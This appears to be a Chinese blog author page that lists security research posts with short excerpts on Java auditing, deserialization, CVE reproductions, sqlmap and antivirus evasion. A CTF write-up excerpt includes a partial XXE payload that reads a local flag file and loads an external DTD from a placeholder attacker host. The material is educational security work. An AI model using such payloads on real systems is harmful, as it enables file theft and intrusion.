自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

Summer's blog

访问https://sumsec.me获取更好的阅读体验

  • 博客(50)
  • 收藏
  • 关注

原创 一篇文章读懂Java代码审计之XXE

前言  学习总结Java审计过程中笔记,审计方法。阅读要求:有简单Java代码基础,了解漏洞原理。漏洞简介   简单来说,XXE就是XML外部实体注入。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。有回显   不说废话,先看效果,成功读取文本内容。   代码分析漏洞成因:public String xxeDo...

2020-05-13 08:48:38 10001 2

原创 小楼昨夜又春风,你知ysoserial-Gadget-URLDNS多少?

小楼昨夜又春风,你知ysoserial-Gadget-URLDNS多少? 你真的懂ysoserial其中的Gadget-URLDNS了吗?你确定吗?百分之百?不确定,还不来看看?

2020-05-13 08:47:58 3629

原创 春眠不觉晓,RCE知多少?

一篇文章带你入门Java代码审计之RCE简单分析Spring Boot Actuators to RCE复现和CVE-2020-8840 FasterXML/jackson-databind 远程代码执行漏洞复现带你入门Java代码审计

2020-05-13 08:46:47 5709

原创 白头搔更短,SSTI惹人心!

万字长文带你走入SSTI的世界,如果你是一名老司机也不要发过这篇文章,里面或许有你不知道的东西!

2020-05-13 08:46:35 5452

原创 逆向学习fastjson反序列化始

前言text:json文本数据len:json文本数据长度token:代表解析到的这一段数据的类型ch:当前读取到的字符bp:当前字符索引sbuf:正在解析段的数据,char数组sp:sbuf最后一个数据的索引hasSpecial=false:需要初始化或者扩容sbuf参考http://www.b1ue.cn/archives/184.html...

2020-07-26 16:09:26 7501

原创 Windows Terminal 配置文件

// To view the default settings, hold "alt" while clicking on the "Settings" button.// For documentation on these settings, see: https://aka.ms/terminal-documentation{ "$schema": "https://aka.ms/...

2020-07-20 19:23:32 7644

原创 JSRC安全课笔记

JSRC课堂笔记

2020-07-20 19:20:25 8608

原创 Java反序列化回显解决方案

于无常处知有情,于有情处知众生...............学习无止境,努力就完事。

2020-06-12 08:36:46 9965

原创 漫谈Commons-Collections反序列化

Java组件Commons-Collections被广泛用于各大系统中,在几年前的被爆出反序列化漏洞,从此打开了Java安全的大门。全网最易懂的反序列化分析文章,花了大量的流程图帮助理解。

2020-06-02 22:20:27 10174 1

原创 漫谈Java反序列化

Java的反序列化漏洞探索出了Java安全的新纪元。开发人员为什么要反序列化呢?

2020-06-02 22:20:13 5211

原创 2020网鼎杯---Java文件上传wp

前言一篇文章读懂Java代码审计之XXE看过我这篇博客应该不难,没看过建议在看看。题解新建xxe.xlsx文件,修改后缀名xxe.zip解压。修改[Content-Types].xml<!DOCTYPE ANY [<!ENTITY % file SYSTEM "file:///flag"><!ENTITY % remote SYSTEM "http://ip:8089/evil.dtd">%remote;%all;]><root&

2020-05-14 14:32:35 8063 4

原创 从安全角度谈Java反射机制--终章

从安全角度谈Java反射机制,深入了解SSTI的payload的构造方法。

2020-05-13 10:28:21 4497

原创 从安全角度谈Java反射机制--前章

从安全角度谈Java反射机制第二章,从代码执行角度剖析Java反射机制。

2020-05-13 10:27:49 6575

原创 从安全角度谈Java反射机制--序章

从安全角度谈Java反射机制第一篇,一共三篇由浅入深,一点点剖析Java的反射机制。

2020-05-13 10:27:11 4418

原创 shellcode加密过杀软

第一次学习编写shellcode,大佬勿喷。

2020-05-13 08:58:17 12157

原创 记一次渗透学习||钓鱼网站渗透

文章目录前言故事起源故事开始故事高潮意外剧情番外篇测试中小技巧前言故事纯属虚构!请不要相信我瞎白话。主要事情:日钓鱼网站主要人物:丞相丞相大表哥有传言我丞相表哥是个富二代,高富帅,简直是黑阔界的担当。U1S1 丞相表哥是挺帅,有没有钱我就不知道了。0505是一个传说中的黑阔,相传黑阔界年龄最小的表哥。我本人相对前两位表哥,我简直就是个弟弟存在。...

2020-05-13 08:58:09 12500 1

原创 CVE-2019-1388 UAC提权复现

目录0x00 前言0x01 漏洞影响0x02 漏洞复现0x03 免责声明0x04 参考0x00 前言该漏洞位于Windows的UAC(User Account Control,用户帐户控制)机制中。默认情况下,Windows会在一个单独的桌面上显示所有的UAC提示——Secure Desktop。这些提示是由名为consent.exe的可执行文件产生的,该可执行文件以NT AUTHORITY...

2020-05-13 08:57:59 8399

原创 VM虚拟机无法安装vmtools解决|本程序需要您将此虚拟机上安装的操作系统更新到SP1

解决办法下载 vm tools iso 文件链接:https://pan.baidu.com/s/1FDdmiwta_5neYI4HvtxRSg提取码:0ll1完美解决在MSDN下载系统镜像文件。

2020-05-13 08:57:52 33951 27

原创 【漏洞复现】Apache Flink任意Jar包上传导致远程代码执行

记一次Apache Flink任意Jar包上传导致远程代码执行复现漏洞过程。致力于小白都能看懂的漏洞复现过程!

2020-05-13 08:57:44 11631 9

原创 不为人知的黑科技||双十一薅羊毛正确姿势

博主花费万字写下这篇长文!意在与让你解锁不为人知的黑科技 get不一样的世界。了解一下程序员是如何轻松愉快的过好双十一的,这些姿势你会吗?明年的你准备怎么办呢?

2020-05-13 08:57:12 7992 1

原创 【漏洞复现】Apache Solr 模板注入远程命令执行

简单记一次Apache Solr远程命令执行复现和复现的时候踩到的坑。

2020-05-13 08:57:05 11532 2

原创 【墨者学院 】uWSGI 漏洞复现(CVE-2018-7490)

0x01 漏洞详情uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议。 uWSGI 2.0.17之前版本中存在路径遍历漏洞,该漏洞源于程序没有正确的处理DOCUMENT_ROOT检测。攻击者可通过发送带有‘…’序列的特制URL请求利用该漏洞查看系统上的任意文件。uWSGI 2.0.17之前版本中存在路径遍历漏洞,该漏洞源于程序没有正确的处理DOCUMENT_RO...

2020-05-13 08:56:12 12589 1

原创 【实战技巧】sqlmap不为人知的骚操作

前言如果有不知道这个漏洞,可以先看看下面的文章https://xz.aliyun.com/t/65310x01 注入前知识补充sqlmap参数:–prefix,–suffix在有些环境中,需要在注入的payload的前面或者后面加一些字符,来保证payload的正常执行。例如,代码中是这样调用数据库的:$query = "SELECT * FROM users WHERE id...

2020-05-13 08:56:05 16674 3

原创 【漏洞预警】泛微OA WorkflowCenterTreeData接口注入漏洞(限oracle数据库)

目录0x01 漏洞描述0x02 漏洞威胁等级0x03 漏洞成因0x04 漏洞复现0x05 修复建议0x06 免责申明0x01 漏洞描述泛微e-cology OA系统的WorkflowCenterTreeData接口在使用oracle数据库时,由于内置sql语句拼接不严,导致其存在sql注入漏洞0x02 漏洞威胁等级高危影响范围所有使用Oracle数据库的泛微服务...

2020-05-13 08:55:25 7485

转载 网络安全现状与未来蓝图||建立高效的网络安全体系

网络安全现状与未来蓝图||建立高效的网络安全体系。原标题:如何建立有效的网络安全防御体系踏实实验室推出万字长篇文章,踏实君结合十年团队经验和二十年从业经验深度整理和剖析了网络安全防御体系如何有效建立,推荐阅读预计20分钟。

2020-05-13 08:55:15 9101 5

原创 【漏洞预警】泛微e-cology OA系统远程代码执行漏洞及其复现

目录0x00前言0x01漏洞描述0x02漏洞复现0x03漏洞POC0x04影响范围0x05漏洞防护0x06免责声明0x00前言2019年9月19日,泛微e-cology OA系统自带BeanShell组件被爆出存在远程代码执行漏洞。攻击者通过调用BeanShell组件中未授权访问的问题接口可直接在目标服务器上执行任意命令,目前该漏洞安全补丁已发布,请使用泛...

2020-05-13 08:54:57 10275 1

原创 惊现CVE-2019-0708 EXP惊醒睡梦中的安全圈

目录0x01前言0x02杂谈0x02了解信息0x03最新文章0x04免责声明0x01前言CVE-2019-0708这个漏洞最早在今年5月份被曝光。浅谈CVE-2019-0708再谈CVE-2019-0708大家可以看看这两篇博客,博主当初写的。内容很详细,还不了解的人可以看看。内含CVE-2019-0708的POC。博主一早睡醒,看看朋友...

2020-05-13 08:54:42 10336 4

原创 python脚本之批量查询网站权重2.0

2.0支持任意url,相对1.0更加方便。比例说我们可以添加这个url https://blog.csdn.net/sun1318578251/article/details/99304612脚本会自动识别URL中的域名是blog.csdn.net,更加智能。不在限制于网站的是否是域名的格式,只要是域名就能正常查询。(个人比较喜欢这个功能)使用方法参考1.0版本地址:https://b...

2020-05-13 08:54:16 2867 2

原创 记一次Nessus无法启动问题--Corrupt Database

昨天在做项目的时候,打开Nessus的时候突然发现Nessus无法启动了。报出一堆的七七八八的鸟文。根据鸟文的说法的是:第一步:停止的Nessus服务。我们可以在任务管理器中停止服务。或者运行services.msc命令打开服务管理器(win+r)第二步浏览数据文档路径(参考官方文档)文档会给出在各个不同的操作系统中默认的文...

2020-05-13 08:54:06 7862 1

原创 python脚本之批量查询网站权重

爱站批量查询网站权重blog: https://blog.csdn.net/sun1318578251如果在cmd运行中得先转脚本对应的绝对路径下运行。不然会爆文件不存在的错误。如果在pycharm等集成环境中使用的话,将脚本文件作为一个项目打开。将需要查询的网站保存在相同目录下的websites.txt文本中,一行一个网站。格式:https://www.xxx.com http://ww...

2020-05-13 08:53:38 2756 7

原创 入门工具脚本之SQLMAP代理脚本

sqlmap这款神器我就不多说了吧。我也相信对于小白来说有些困扰,每次使用sqlmap的时候,一个不小心就被禁ip了。使用sqlmap的代理池去进行渗透测试可以很好的帮助我们就解决这个的问题。收集的大量资料和教程后,我决定编写的sqlmap的代理脚本。编写思路第一步使用python库中socket库。大家可以自己去百度一下关于这个库的内容。推荐博客:http...

2020-05-13 08:52:49 4686 5

原创 浅谈Pentestbox神器优势

简单介绍说明PentestBox神器 PentestBox:渗透测试盒子 顾名思义,这是一个渗透工具包,但是不同于绝大多数国内xx工具包的是,这里集成的大都是Linux下的工具,KaliLinux上面的常用的很多工具这里面也都集成了。PentestBox官网:https://pentestbox.org/zh/PentestBox在官网有两个版本:个人推荐安...

2020-05-13 08:52:29 15873 3

原创 CVE-2019-16097 || Harbor任意管理员注册漏洞复现

目录0x01 前言0x02 漏洞简介及危害0x03 漏洞复现0x04 修复建议#0x01 前言Harbor是一个用于存储和分发Docker镜像的企业级Registry服务器,通过添加一些企业必需的功能特性,例如安全、标识和管理等,扩展了开源Docker Distribution。作为一个企业级私有Registry服务器,Harbor提供了更好的性能和安全...

2020-05-13 08:51:55 3642 2

翻译 So you want to be a Hacker?(所以你想成为黑客?)

本文翻译原文:http://www.treeyhub.com/topics/133/so-you-want-to-be-a-hacker原文链接:https://netsec.ws/?p=468最近,我读到很多关于参与“信息安全”比赛的问题,还有文章和一般性讨论,在我看来,其中存在着不少使人误导的信息。这个结论可能有点苛刻,我确信他们是出于善意的目的,甚至这些建议也能起到帮助作用(没...

2020-05-13 08:51:44 1853

原创 python之pip更新失败问题及解决方法

渣渣白安装pip时首先被这个问题困扰了很久一直都无法解决。UnicodeDecodeError: 'ascii' codec can't decode byte 0xc7in position 7由于渣渣白的技术水平呢,我安装时候没有看懂这个原因。直到看了这篇博客之后才发现问题所在,是字节码编码问题。http://www.yingzinanfei.com/2017/02...

2020-05-13 08:51:32 36886 23

原创 渣渣白使用Safe3 SQL注入实战篇

说明:1. 未经授权的渗透测试都是违法的! 2. 文章用红色字体编写的部分是关键部分(认真看)!!! 3. 文章用黑色字体编写的部分是渣渣白内心独白,无关紧0! 4. 文章用其他颜色字体编写的部分是次要部分。由于小伙伴们的强烈热情,我写下这篇博客。文章内容:简单的使用Safe3 SQL工具拿下一个网站后台。...

2020-05-13 08:51:06 2707 4

原创 渣渣白学习渗透之路(墨者学院sql注入之旅)

渣渣白学习渗透之路说明:1. 未经授权的渗透测试都是违法的! 2. 文章用红色字体编写的部分是关键部分(认真看)!!! 3. 文章用黑色字体编写的部分是渣渣白内心独白,无关紧0! 4. 文章用其他颜色字体编写的部分是次要部分。渣渣白学习渗透也有一段时间了,一直瞎几把乱测试站点...

2020-05-13 08:50:56 1870 3

原创 认识OSCP与国外INE机构OSCP课程(价值999美元)已翻译版分享

Offensive Security Certified Professional (OSCP)Most recognized penetration testing certification in the industryEarn after passing the 24-hour performance based examPre-requisite Course: Penetr...

2020-05-13 08:50:38 13610 4

原创 再谈cve-2019-0708漏洞最新事情,更新poc及个人说明

距离CVE-2019-0708漏洞出现的了有一段时间了,在此期间poc都更新了几个版本。有人也来问过我具体这个漏洞怎么利用、实现。我在篇文章里面会有统一的回答一下我的见解,希望的大佬们不要喷,以下纯属与个人看法。理解不对希望可以指出。第一,我觉得这个是新爆出的巨大的微软系统漏洞,exp一下是不可能出现的,最近国家在网络上也有些行动的。我建议大家不要这么心急,去想着怎么利用这个漏洞。目前我...

2020-05-13 08:50:24 7488

原创 C语言 算法(插入,冒泡,选择)排序动画效果理解

本人在开始学习C语言的最初也是对与这些算法使用的不是特别明白,找了很久的资料才弄懂。因为一个偶然的机会写下这些代码。希望能帮助小白门学习这些算法,尽快入门。所有资料文档来源百度百科。/*start_time:2019/2/28end_time: 2019/3/2event:排序算法动画演示程序requirements:实现数据排序算法(冒泡、选择和插入)的动画效果creator:清...

2020-05-13 08:50:08 1525 3

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除